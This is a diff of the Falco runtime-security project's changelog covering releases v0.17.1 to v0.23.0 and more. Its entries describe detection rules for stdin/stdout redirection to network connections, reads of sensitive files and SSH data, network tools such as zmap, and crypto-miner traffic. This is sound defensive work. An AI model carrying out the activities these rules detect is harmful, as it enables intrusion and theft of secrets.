+* rule(macro remote_file_copy_procs): fix reference to remote_file_copy_binaries [[#1224](https://github.com/falcosecurity/falco/pull/1224)]
+* rule(list allowed_k8s_users): whitelisted kube-apiserver-healthcheck user created by kops >= 1.17.0 for the kube-apiserver-healthcheck sidecar [[#1286](https://github.com/falcosecurity/falco/pull/1286)]
+* rule(Change thread namespace): Allow `protokube`, `dockerd`, `tini` and `aws` binaries to change thread namespace. [[#1222](https://github.com/falcosecurity/falco/pull/1222)]
+* rule(macro exe_running_docker_save): to filter out cmdlines containing `/var/run/docker`. [[#1222](https://github.com/falcosecurity/falco/pull/1222)]
+* rule(macro user_known_cron_jobs): new macro to be overridden to list known cron jobs   [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Schedule Cron Jobs): exclude known cron jobs  [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_update_package_registry): new macro to be overridden to list known package registry update  [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Update Package Registry): exclude known package registry update [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_read_ssh_information_activities): new macro to be overridden to list known activities that read SSH info  [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Read ssh information): do not throw for activities known to read SSH info [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_read_sensitive_files_activities): new macro to be overridden to list activities known to read sensitive files [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Read sensitive file trusted after startup): do not throw for activities known to read sensitive files [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Read sensitive file untrusted): do not throw for activities known to read sensitive files [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_write_rpm_database_activities): new macro to be overridden to list activities known to write RPM database [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Write below rpm database): do not throw for activities known to write RPM database [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_db_spawned_processes): new macro to be overridden to list processes known to spawn DB [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(DB program spawned process): do not throw for processes known to spawn DB [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_modify_bin_dir_activities): new macro to be overridden to list activities known to modify bin directories [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Modify binary dirs): do not throw for activities known to modify bin directories [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_mkdir_bin_dir_activities): new macro to be overridden to list activities known to create directories below bin directories [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Mkdir binary dirs): do not throw for activities known to create directories below bin directories [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_system_user_login): new macro to exclude known system user logins [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(System user interactive): do not throw for known system user logins [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_user_management_activities): new macro to be overridden to list activities known to do user managements activities [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(User mgmt binaries): do not throw for activities known to do user managements activities [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_create_files_below_dev_activities): new macro to be overridden to list activities known to create files below dev [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Create files below dev): do not throw for activities known to create files below dev [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_contact_k8s_api_server_activities): new macro to be overridden to list activities known to contact Kubernetes API server [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Contact K8S API Server From Container): do not throw for activities known to contact Kubernetes API server [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_network_tool_activities): new macro to be overridden to list activities known to spawn/use network tools [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Launch Suspicious Network Tool in Container): do not throw for activities known to spawn/use network tools [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_remove_data_activities): new macro to be overridden to list activities known to perform data remove commands [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Remove Bulk Data from Disk): do not throw for activities known to perform data remove commands [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_create_hidden_file_activities): new macro to be overridden to list activities known to create hidden files [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Create Hidden Files or Directories): do not throw for activities known to create hidden files [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_stand_streams_redirect_activities): new macro to be overridden to list activities known to redirect stream to network connection (in containers) [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Redirect STDOUT/STDIN to Network Connection in Container): do not throw for activities known to redirect stream to network connection (in containers) [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_container_drift_activities): new macro to be overridden to list activities known to create executables in containers [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Container Drift Detected (chmod)): do not throw for activities known to give execution permissions to files in containers [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Container Drift Detected (open+create)): do not throw for activities known to create executables in containers [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_node_port_service): do not throw for services known to start with a NopePort service type (k8s) [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Create NodePort Service): do not throw for services known to start with a NopePort service type (k8s) [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_exec_pod_activities): do not throw for activities known to attach/exec to a pod (k8s) [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Attach/Exec Pod): do not throw for activities known to attach/exec to a pod (k8s) [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro trusted_pod): defines trusted pods by an image list  [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Pod Created in Kube Namespace): do not throw for trusted pods [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro trusted_sa): define trusted ServiceAccount [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Service Account Created in Kube Namespace): do not throw for trusted ServiceAccount [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(list network_tool_binaries): add zmap to the list [[#1284](https://github.com/falcosecurity/falco/pull/1284)]
+* rule(macro root_dir): correct macro to exactly match the `/root` dir and not other with just `/root` as a prefix [[#1279](https://github.com/falcosecurity/falco/pull/1279)]
+* rule(macro user_expected_terminal_shell_in_container_conditions): allow whitelisting terminals in containers under specific conditions [[#1154](https://github.com/falcosecurity/falco/pull/1154)]
+* rule(macro user_known_write_below_binary_dir_activities): allow writing to a binary dir in some conditions [[#1260](https://github.com/falcosecurity/falco/pull/1260)]
+* rule(macro trusted_logging_images): Add addl fluentd image [[#1230](https://github.com/falcosecurity/falco/pull/1230)]
+* rule(macro trusted_logging_images): Let azure-npm image write to /var/log [[#1230](https://github.com/falcosecurity/falco/pull/1230)]
+* rule(macro lvprogs_writing_conf): Add lvs as a lvm program [[#1230](https://github.com/falcosecurity/falco/pull/1230)]
+* rule(macro user_known_k8s_client_container): Allow hcp-tunnelfront to run kubectl in containers [[#1230](https://github.com/falcosecurity/falco/pull/1230)]
+* rule(list allowed_k8s_users): Add vertical pod autoscaler as known k8s users [[#1230](https://github.com/falcosecurity/falco/pull/1230)]
+* rule(Anonymous Request Allowed): update to checking auth decision equals to allow [[#1267](https://github.com/falcosecurity/falco/pull/1267)]
+* rule(Container Drift Detected (chmod)): new rule to detect if an existing file get exec permissions in a container [[#1254](https://github.com/falcosecurity/falco/pull/1254)]
+* rule(Container Drift Detected (open+create)): new rule to detect if a new file with execution permission is created in a container [[#1254](https://github.com/falcosecurity/falco/pull/1254)]
+* rule(Mkdir binary dirs): correct condition in macro `bin_dir_mkdir` to catch `mkdirat` syscall [[#1250](https://github.com/falcosecurity/falco/pull/1250)]
+* rule(Modify binary dirs): correct condition in macro `bin_dir_rename` to catch `rename`, `renameat`, and `unlinkat` syscalls [[#1250](https://github.com/falcosecurity/falco/pull/1250)]
+* rule(Create files below dev): correct condition to catch `openat` syscall [[#1250](https://github.com/falcosecurity/falco/pull/1250)]
+* rule(macro user_known_set_setuid_or_setgid_bit_conditions): create macro [[#1213](https://github.com/falcosecurity/falco/pull/1213)]
+
+## v0.23.0
+
+Released on 2020-18-05
+
+### Major Changes
+
+* BREAKING CHANGE: the falco-driver-loader script now references `falco-probe.o` and `falco-probe.ko` as `falco.o` and `falco.ko` [[#1158](https://github.com/falcosecurity/falco/pull/1158)]
+* BREAKING CHANGE: the `falco-driver-loader` script environment variable to use a custom repository to download drivers now uses the `DRIVERS_REPO` environment variable instead of `DRIVER_LOOKUP_URL`. This variable must contain the parent URI containing the following directory structure `/$driver_version$/falco_$target$_$kernelrelease$_$kernelversion$.[ko|o]`. e.g: [[#1160](https://github.com/falcosecurity/falco/pull/1160)]
+* new(scripts): options and command-line usage for `falco-driver-loader` [[#1200](https://github.com/falcosecurity/falco/pull/1200)]
+* new: ability to specify exact matches when adding rules to Falco engine (only API) [[#1185](https://github.com/falcosecurity/falco/pull/1185)]
+* new(docker): add an image that wraps the `falco-driver-loader` with the toolchain [[#1192](https://github.com/falcosecurity/falco/pull/1192)]
+* new(docker): add `falcosecurity/falco-no-driver` image [[#1205](https://github.com/falcosecurity/falco/pull/1205)]
+
+
+### Minor Changes
+
+* update(scripts): improve `falco-driver-loader` output messages [[#1200](https://github.com/falcosecurity/falco/pull/1200)]
+* update: containers look for prebuilt drivers on the Drivers Build Grid [[#1158](https://github.com/falcosecurity/falco/pull/1158)]
+* update: driver version bump to 96bd9bc560f67742738eb7255aeb4d03046b8045 [[#1190](https://github.com/falcosecurity/falco/pull/1190)]
+* update(docker): now `falcosecurity/falco:slim-*` alias to `falcosecurity/falco-no-driver:*` [[#1205](https://github.com/falcosecurity/falco/pull/1205)]
+* docs: instructions to run unit tests [[#1199](https://github.com/falcosecurity/falco/pull/1199)]
+* docs(examples): move `/examples` to `contrib` repo [[#1191](https://github.com/falcosecurity/falco/pull/1191)]
+* update(docker): remove `minimal` image [[#1196](https://github.com/falcosecurity/falco/pull/1196)]
+* update(integration): move `/integrations` to `contrib` repo [[#1157](https://github.com/falcosecurity/falco/pull/1157)]
+* https://dl.bintray.com/driver/$driver_version$/falco_$target$_$kernelrelease$_$kernelversion$.[ko|o]` [[#1160](https://github.com/falcosecurity/falco/pull/1160)]
+* update(docker/event-generator): remove the event-generator from Falco repository [[#1156](https://github.com/falcosecurity/falco/pull/1156)]
+* docs(examples): set audit level to metadata for object secrets [[#1153](https://github.com/falcosecurity/falco/pull/1153)]
+
+
+### Bug Fixes
+
+* fix(scripts): upstream files (prebuilt drivers) for the generic Ubuntu kernel contains "ubuntu-generic" [[#1212](https://github.com/falcosecurity/falco/pull/1212)]
+* fix: support Falco driver on Linux kernels 5.6.y [[#1174](https://github.com/falcosecurity/falco/pull/1174)]
+
+
+### Rule Changes
+
+* rule(Redirect STDOUT/STDIN to Network Connection in Container): correct rule name as per rules naming convention [[#1164](https://github.com/falcosecurity/falco/pull/1164)]
+* rule(Redirect STDOUT/STDIN to Network Connection in Container): new rule to detect Redirect stdout/stdin to network connection in container [[#1152](https://github.com/falcosecurity/falco/pull/1152)]
+* rule(K8s Secret Created): new rule to track the creation of Kubernetes secrets (excluding kube-system and service account secrets) [[#1151](https://github.com/falcosecurity/falco/pull/1151)]
+* rule(K8s Secret Deleted): new rule to track the deletion of Kubernetes secrets (excluding kube-system and service account secrets) [[#1151](https://github.com/falcosecurity/falco/pull/1151)]
+
+## v0.22.1
+
+Released on 2020-17-04
+
+### Major Changes
+
+* Same as v0.22.0
+
+### Minor Changes
+
+* Same as v0.22.0
+
+### Bug Fixes
+
+* fix: correct driver path (/usr/src/falco-%driver_version%) for RPM package [[#1148](https://github.com/falcosecurity/falco/pull/1148)]
+
+### Rule Changes
+
+* Same as v0.22.0
+
+## v0.22.0
+
+Released on 2020-16-04
+
+### Major Changes
+
+* new: falco version and driver version are distinct and not coupled anymore [[#1111](https://github.com/falcosecurity/falco/pull/1111)]
+* new: flag to disable asynchronous container metadata (CRI) fetch `--disable-cri-async` [[#1099](https://github.com/falcosecurity/falco/pull/1099)]
+
+
+### Minor Changes
+
+* docs(integrations): update API resource versions to Kubernetes 1.16 [[#1044](https://github.com/falcosecurity/falco/pull/1044)]
+* docs: add new release archive to the `README.md` [[#1098](https://github.com/falcosecurity/falco/pull/1098)]
+* update: driver version a259b4bf49c3 [[#1138](https://github.com/falcosecurity/falco/pull/1138)]
+* docs(integrations/k8s-using-daemonset): --cri flag correct socket path [[#1140](https://github.com/falcosecurity/falco/pull/1140)]
+* update: bump driver version to cd3d10123e [[#1131](https://github.com/falcosecurity/falco/pull/1131)]
+* update(docker): remove RHEL, kernel/linuxkit, and kernel/probeloader images [[#1124](https://github.com/falcosecurity/falco/pull/1124)]
+* update: falco-probe-loader script is falco-driver-loader now [[#1111](https://github.com/falcosecurity/falco/pull/1111)]
+* update: using only sha256 hashes when pulling build dependencies [[#1118](https://github.com/falcosecurity/falco/pull/1118)]
+
+
+### Bug Fixes
+
+* fix(integrations/k8s-using-daemonset): added missing privileges for the apps Kubernetes API group in the falco-cluster-role when using RBAC [[#1136](https://github.com/falcosecurity/falco/pull/1136)]
+* fix: connect to docker works also with libcurl >= 7.69.0 [[#1138](https://github.com/falcosecurity/falco/pull/1138)]
+* fix: HOST_ROOT environment variable detection [[#1133](https://github.com/falcosecurity/falco/pull/1133)]
+* fix(driver/bpf): stricter conditionals while dealing with strings [[#1131](https://github.com/falcosecurity/falco/pull/1131)]
+* fix: `/usr/bin/falco-${DRIVER_VERSION}` driver directory [[#1111](https://github.com/falcosecurity/falco/pull/1111)]
+* fix: FALCO_VERSION env variable inside Falco containers contains the Falco version now (not the docker image tag) [[#1111](https://github.com/falcosecurity/falco/pull/1111)]
+
+
+### Rule Changes
+
+* rule(macro user_expected_system_procs_network_activity_conditions): allow whitelisting system binaries using the network under specific conditions [[#1070](https://github.com/falcosecurity/falco/pull/1070)]
+* rule(Full K8s Administrative Access): detect any k8s operation by an administrator with full access [[#1122](https://github.com/falcosecurity/falco/pull/1122)]
+* rule(Ingress Object without TLS Certificate Created): detect any attempt to create an ingress without TLS certification (rule enabled by default) [[#1122](https://github.com/falcosecurity/falco/pull/1122)]
+* rule(Untrusted Node Successfully Joined the Cluster): detect a node successfully joined the cluster outside of the list of allowed nodes [[#1122](https://github.com/falcosecurity/falco/pull/1122)]
+* rule(Untrusted Node Unsuccessfully Tried to Join the Cluster): detect an unsuccessful attempt to join the cluster for a node not in the list of allowed nodes [[#1122](https://github.com/falcosecurity/falco/pull/1122)]
+* rule(Network Connection outside Local Subnet): detect traffic to image outside local subnet [[#1122](https://github.com/falcosecurity/falco/pull/1122)]
+* rule(Outbound or Inbound Traffic not to Authorized Server Process and Port): detect traffic that is not to authorized server process and port [[#1122](https://github.com/falcosecurity/falco/pull/1122)]
+* rule(Delete or rename shell history): "mitre_defense_evation" tag corrected to "mitre_defense_evasion" [[#1143](https://github.com/falcosecurity/falco/pull/1143)]
+* rule(Delete Bash History): "mitre_defense_evation" tag corrected to "mitre_defense_evasion" [[#1143](https://github.com/falcosecurity/falco/pull/1143)]
+* rule(Write below root): use pmatch to check against known root directories [[#1137](https://github.com/falcosecurity/falco/pull/1137)]
+* rule(Detect outbound connections to common miner pool ports): whitelist sysdig/agent and falcosecurity/falco for query miner domain dns [[#1115](https://github.com/falcosecurity/falco/pull/1115)]
+* rule(Service Account Created in Kube Namespace): only detect sa created in kube namespace with success [[#1117](https://github.com/falcosecurity/falco/pull/1117)]
+
+## v0.21.0
+
+Released on 2020-03-17
+
+### Major Changes
+
+* BREAKING CHANGE: the SYSDIG_BPF_PROBE environment variable is now just FALCO_BPF_PROBE (please update your systemd scripts or kubernetes deployments. [[#1050](https://github.com/falcosecurity/falco/pull/1050)]
+* new: automatically publish deb packages (from git master branch) to public dev repository [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
+* new: automatically publish rpm packages (from git master branch) to public dev repository [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
+* new: automatically release deb packages (from git tags) to public repository [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
+* new: automatically release rpm packages (from git tags) to public repository [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
+* new: automatically publish docker images from master (master, master-slim, master-minimal) [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
+* new: automatically publish docker images from git tag (tag, tag-slim, tag-master, latest, latest-slim, latest-minimal) [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
+* new: sign packages with falcosecurity gpg key [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
+
+### Minor Changes
+
+* new: falco_version_prerelease contains the number of commits since last tag on the master [[#1086](https://github.com/falcosecurity/falco/pull/1086)]
+* docs: update branding [[#1074](https://github.com/falcosecurity/falco/pull/1074)]
+* new(docker/event-generator): add example k8s resource files that allow running the event generator in a k8s cluster. [[#1088](https://github.com/falcosecurity/falco/pull/1088)]
+* update: creating *-dev docker images using build arguments at build time [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
+* update: docker images use packages from the new repositories [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
+* update: docker image downloads old deb dependencies (gcc-6, gcc-5, binutils-2.30) from a new open repository [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
+
+### Bug Fixes
+
+* fix(docker): updating `stable` and `local` images to run from `debian:stable` [[#1018](https://github.com/falcosecurity/falco/pull/1018)]
+* fix(event-generator): the image used by the event generator deployment to `latest`. [[#1091](https://github.com/falcosecurity/falco/pull/1091)]
+* fix: -t (to disable rules by certain tag) or -t (to only run rules with a certain tag) work now [[#1081](https://github.com/falcosecurity/falco/pull/1081)]
+* fix: the falco driver now compiles on >= 5.4 kernels [[#1080](https://github.com/falcosecurity/falco/pull/1080)]
+* fix: download falco packages which url contains character to encode - eg, `+` [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
+* fix(docker): use base name in docker-entrypoint.sh [[#981](https://github.com/falcosecurity/falco/pull/981)]
+
+### Rule Changes
+
+* rule(detect outbound connections to common miner pool ports): disabled by default [[#1061](https://github.com/falcosecurity/falco/pull/1061)]
+* rule(macro net_miner_pool): add localhost and rfc1918 addresses as exception in the rule. [[#1061](https://github.com/falcosecurity/falco/pull/1061)]
+* rule(change thread namespace): modify condition to detect suspicious container activity [[#974](https://github.com/falcosecurity/falco/pull/974)]
+
+## v0.20.0
+
+Released on 2020-02-24
+
+### Major Changes
+
+* fix: memory leak introduced in 0.18.0 happening while using json events and the kubernetes audit endpoint [[#1041](https://github.com/falcosecurity/falco/pull/1041)]
+* new: grpc version api [[#872](https://github.com/falcosecurity/falco/pull/872)]
+
+
+### Bug Fixes
+
+* fix: the base64 output format (-b) now works with both json and normal output. [[#1033](https://github.com/falcosecurity/falco/pull/1033)]
+* fix: version follows semver 2 bnf [[#872](https://github.com/falcosecurity/falco/pull/872)]
+
+### Rule Changes
+
+* rule(write below etc): add "dsc_host" as a ms oms program [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
+* rule(write below etc): let mcafee write to /etc/cma.d  [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
+* rule(write below etc): let avinetworks supervisor write some ssh cfg [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
+* rule(write below etc): alow writes to /etc/pki from openshift secrets dir [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
+* rule(write below root): let runc write to /exec.fifo [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
+* rule(change thread namespace): let cilium-cni change namespaces [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
+* rule(run shell untrusted): let puma reactor spawn shells [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
+
+
+## v0.19.0
+
+Released on 2020-01-23
+
+### Major Changes
+
+* new: security audit [[#977](https://github.com/falcosecurity/falco/pull/977)]
+* instead of crashing, now falco will report the error when an internal error occurs while handling an event to be inspected. the log line will be of type error and will contain the string `error handling inspector event` [[#746](https://github.com/falcosecurity/falco/pull/746)]
+* build: bump grpc to 1.25.0 [[#939](https://github.com/falcosecurity/falco/pull/939)]
+* build: (most of) dependencies are bundled dynamically (by default) [[#968](https://github.com/falcosecurity/falco/pull/968)]
+* test: integration tests now can run on different distributions via docker containers, for now CentOS 7 and Ubuntu 18.04 with respective rpm and deb packages [[#1012](https://github.com/falcosecurity/falco/pull/1012)]
+
+### Minor Changes
+
+* proposal: rules naming convention [[#980](https://github.com/falcosecurity/falco/pull/980)]
+* update: also allow posting json arrays containing k8s audit events to the k8s_audit endpoint. [[#967](https://github.com/falcosecurity/falco/pull/967)]
+* update: add support for k8s audit events to the falco-event-generator container. [[#997](https://github.com/falcosecurity/falco/pull/997)]
+* update: falco-tester base image is fedora:31 now [[#968](https://github.com/falcosecurity/falco/pull/968)]
+* build: switch to circleci [[#968](https://github.com/falcosecurity/falco/pull/968)]
+* build: bundle openssl into falco-builder docker image [[#1004](https://github.com/falcosecurity/falco/pull/1004)]
+* build: falco-builder docker image revamp (centos:7 base image) [[#1004](https://github.com/falcosecurity/falco/pull/1004)]
+* update: puppet module had been renamed from "sysdig-falco" to "falco" [[#922](https://github.com/falcosecurity/falco/pull/922)]
+* update: adds a hostname field to grpc output [[#927](https://github.com/falcosecurity/falco/pull/927)]
+* build: download grpc from their github repo [[#933](https://github.com/falcosecurity/falco/pull/933)]
+* update: ef_drop_falco is now ef_drop_simple_cons [[#922](https://github.com/falcosecurity/falco/pull/922)]
+* update(docker): use host_root environment variable rather than sysdig_host_root [[#922](https://github.com/falcosecurity/falco/pull/922)]
+* update: ef_drop_falco is now ef_drop_simple_cons [[#922](https://github.com/falcosecurity/falco/pull/922)]
+
+### Bug Fixes
+
+* fix: providing clang into docker-builder [[#972](https://github.com/falcosecurity/falco/pull/972)]
+* fix: prevent throwing json type error c++ exceptions outside of the falco engine when procesing k8s audit events. [[#928](https://github.com/falcosecurity/falco/pull/928)]
+* fix(docker/kernel/linuxkit): correct from for falco minimal image [[#913](https://github.com/falcosecurity/falco/pull/913)]
+
+### Rule Changes
+
+* rules(list network_tool_binaries): add some network tools to detect suspicious network activity. [[#973](https://github.com/falcosecurity/falco/pull/973)]
+* rules(write below etc): allow automount to write to /etc/mtab [[#957](https://github.com/falcosecurity/falco/pull/957)]
+* rules(macro user_known_k8s_client_container): when executing the docker client, exclude fluentd-gcp-scaler container running in the `kube-system` namespace to avoid false positives [[#962](https://github.com/falcosecurity/falco/pull/962)]
+* rules(the docker client is executed in a container): detect the execution of the docker client in a container and logs it with warning priority.  [[#915](https://github.com/falcosecurity/falco/pull/915)]
+* rules(list k8s_client_binaries): create and add docker, kubectl, crictl [[#915](https://github.com/falcosecurity/falco/pull/915)]
+* rules(macro container_entrypoint): add docker-runc-cur  [[#914](https://github.com/falcosecurity/falco/pull/914)]
+* rules(list user_known_chmod_applications): add hyperkube [[#914](https://github.com/falcosecurity/falco/pull/914)]
+* rules(list network_tool_binaries): add some network tools to detect suspicious network activity. [[#975](https://github.com/falcosecurity/falco/pull/975)]
+* rules(macro user_known_k8s_client_container): macro to match kube-system namespace [[#955](https://github.com/falcosecurity/falco/pull/955)]
+* rules(contact k8s api server from container): now it can automatically resolve the cluster ip address  [[#952](https://github.com/falcosecurity/falco/pull/952)]
+* rules(macro k8s_api_server): new macro to match the default k8s api server [[#952](https://github.com/falcosecurity/falco/pull/952)]
+* rules(macro sensitive_vol_mount): add more sensitive host paths [[#929](https://github.com/falcosecurity/falco/pull/929)]
+* rules(macro sensitive_mount): add more sensitive paths [[#929](https://github.com/falcosecurity/falco/pull/929)]
+* rules(macro consider_metadata_access): macro to decide whether to consider metadata or not (off by default) [[#943](https://github.com/falcosecurity/falco/pull/943)]
+* rules(contact cloud metadata service from container): add rules to detect access to gce instance metadata [[#943](https://github.com/falcosecurity/falco/pull/943)]
+* rules(macro sensitive_vol_mount): align sensitive mounts macro between k8s audit rules and syscall rules [[#950](https://github.com/falcosecurity/falco/pull/950)]
+* rules(macro consider_packet_socket_communication): macro to consider or not packet socket communication (off by default) [[#945](https://github.com/falcosecurity/falco/pull/945)]
+* rules(packet socket created in container): rule to detect raw packets creation [[#945](https://github.com/falcosecurity/falco/pull/945)]
+* rules(macro exe_running_docker_save): fixed false positives in multiple rules that were caused by the use of docker in docker [[#951](https://github.com/falcosecurity/falco/pull/951)]
+* rules(modify shell configuration file): fixed a false positive by excluding "exe_running_docker_save" [[#949](https://github.com/falcosecurity/falco/pull/949)]
+* rules(update package repository): fixed a false positive by excluding "exe_running_docker_save". [[#948](https://github.com/falcosecurity/falco/pull/948)]
+* rules(the docker client is executed in a container): when executing the docker client, exclude containers running in the `kube-system` namespace to avoid false positives [[#955](https://github.com/falcosecurity/falco/pull/955)]
+* rules(list user_known_chmod_applications): add kubelet [[#944](https://github.com/falcosecurity/falco/pull/944)]
+* rules(set setuid or setgid bit): fixed a false positive by excluding "exe_running_docker_save" [[#946](https://github.com/falcosecurity/falco/pull/946)]
+* rules(macro user_known_package_manager_in_container): allow users to specify conditions that match a legitimate use case for using a package management process in a container. [[#941](https://github.com/falcosecurity/falco/pull/941)]
+
+## v0.18.0
+
+Released 2019-10-28
+
+### Major Changes
+
+* falco grpc api server implementation, contains a subscribe method to subscribe to outputs from any grpc capable language [[#822](https://github.com/falcosecurity/falco/pull/822)]
+* add support for converting k8s pod security policies (psps) into set of falco rules that can be used to evaluate the conditions specified in the psp. [[#826](https://github.com/falcosecurity/falco/pull/826)]
+* initial redesign container images to remove build tools and leverage init containers for kernel module delivery. [[#776](https://github.com/falcosecurity/falco/pull/776)]
+* add flags to disable `syscall` event source or `k8s_audit` event source [[#779](https://github.com/falcosecurity/falco/pull/779)]
+
+### Minor Changes
+
+* allow for unique names for psp converted rules/macros/lists/rule names as generated by falcoctl 0.0.3 [[#895](https://github.com/falcosecurity/falco/pull/895)]
+* make it easier to run regression tests without necessarily using the falco-tester docker image. [[#808](https://github.com/falcosecurity/falco/pull/808)]
+* fix falco engine compatibility with older k8s audit rules files. [[#893](https://github.com/falcosecurity/falco/pull/893)]
+* add tests for psp conversions with names containing spaces/dashes. [[#899](https://github.com/falcosecurity/falco/pull/899)]
+
+### Bug Fixes
+
+* handle multi-document yaml files when reading rules files. [[#760](https://github.com/falcosecurity/falco/pull/760)]
+* improvements to how the webserver handles incoming invalid inputs [[#759](https://github.com/falcosecurity/falco/pull/759)]
+* fix: make lua state access thread-safe [[#867](https://github.com/falcosecurity/falco/pull/867)]
+* fix compilation on gcc 5.4 by working around gcc bug https://gcc.gnu.org/bugzilla/show_bug.cgi?id=56480 [[#873](https://github.com/falcosecurity/falco/pull/873)]
+* add explicit dependency between tests and catch2 header file. [[#879](https://github.com/falcosecurity/falco/pull/879)]
+* fix: stable dockerfile libgcc-6-dev dependencies [[#830](https://github.com/falcosecurity/falco/pull/830)]
+* fix: build dependencies for the local dockerfile [[#782](https://github.com/falcosecurity/falco/pull/782)]
+* fix: a crash bug that could result from reading more than ~6 rules files [[#906](https://github.com/falcosecurity/falco/issues/906)] [[#907](https://github.com/falcosecurity/falco/pull/907)]
+
+### Rule Changes
+
+* rules: add calico/node to trusted privileged container list [[#902](https://github.com/falcosecurity/falco/pull/902)]
+* rules: add macro `calico_node_write_envvars` to exception list of write below etc [[#902](https://github.com/falcosecurity/falco/pull/902)]
+* rules: add exception for rule write below rpm, this is a fp caused by amazon linux 2 yum. [[#755](https://github.com/falcosecurity/falco/pull/755)]
+* rules: ignore sensitive mounts from the ecs-agent [[#881](https://github.com/falcosecurity/falco/pull/881)]
+* rules: add rules to detect crypto mining activities [[#763](https://github.com/falcosecurity/falco/pull/763)]
+* rules: add back rule delete bash history for backport compatibility [[#864](https://github.com/falcosecurity/falco/pull/864)]
+* rule: syscalls are used to detect suid and sgid [[#765](https://github.com/falcosecurity/falco/pull/765)]
+* rules: delete bash history is renamed to delete or rename shell history [[#762](https://github.com/falcosecurity/falco/pull/762)]
+* rules: add image fluent/fluentd-kubernetes-daemonset to clear log trusted images [[#852](https://github.com/falcosecurity/falco/pull/852)]
+* rules: include default users created by `kops`. [[#898](https://github.com/falcosecurity/falco/pull/898)]
+* rules: delete or rename shell history: when deleting a shell history file now the syscalls are taken into account rather than just the commands deleting the files [[#762](https://github.com/falcosecurity/falco/pull/762)]
+* rules: delete or rename shell history: history deletion now supports fish and zsh in addition to bash [[#762](https://github.com/falcosecurity/falco/pull/762)]
+* rules: "create hidden files or directories" and "update package repository" now trigger also if the files are moved and not just if modified or created. [[#766](https://github.com/falcosecurity/falco/pull/766)]
+
+## v0.17.1
+
+Released 2019-09-26
+
+### Major Changes
+
+* Same as v0.17.0
+
+### Minor Changes
+
+* Same as v0.17.0
+
+### Bug Fixes
+
+* All in v0.17.0
+* Fix a build problem for pre-built kernel probes. [[draios/sysdig#1471](https://github.com/draios/sysdig/pull/1471)]
+
+### Rule Changes
+
+* Same as v0.17.0
+
 ## v0.17.0

 Released 2019-07-31

-## Major Changes
+### Major Changes

 * **The set of supported platforms has changed**. Switch to a reorganized builder image that uses Centos 7 as a base. As a result, falco is no longer supported on Centos 6. The other supported platforms should remain the same [[#719](https://github.com/falcosecurity/falco/pull/719)]

-## Minor Changes
+### Minor Changes

 * When enabling rules within the falco engine, use rule substrings instead of regexes. [[#743](https://github.com/falcosecurity/falco/pull/743)]

 * Additional improvements to the handling and display of rules validation errors [[#744](https://github.com/falcosecurity/falco/pull/744)] [[#747](https://github.com/falcosecurity/falco/pull/747)]

